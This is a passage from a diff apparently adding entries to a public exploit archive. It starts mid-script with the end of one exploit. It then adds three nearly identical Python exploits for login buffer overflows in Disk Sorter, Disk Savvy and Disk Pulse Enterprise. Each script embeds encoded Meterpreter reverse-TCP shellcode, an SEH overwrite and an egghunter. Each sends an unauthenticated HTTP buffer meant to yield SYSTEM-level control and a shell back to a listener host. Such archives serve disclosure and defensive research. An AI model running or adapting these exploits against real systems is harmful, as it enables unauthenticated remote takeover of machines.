connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1004FAF3
nseh = "\x90\x90\xEB\x0B"
seh = "\xF3\xFA\x04\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

100
platforms/windows/remote/40833.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/python
print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.24: www.exploit-db.com/exploits/40458/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1004F9DD
nseh = "\x90\x90\xEB\x0B"
seh = "\xDD\xF9\x04\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

100
platforms/windows/remote/40834.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/python
print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.32: www.exploit-db.com/exploits/40459/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 10081A9C
nseh = "\x90\x90\xEB\x0B"
seh = "\x9C\x1A\x08\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "\x42" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

100
platforms/windows/remote/40835.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/python
print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.34: www.exploit-db.com/exploits/40452/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 10015BFE
nseh = "\x90\x90\xEB\x0B"
seh = "\xFE\x5B\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()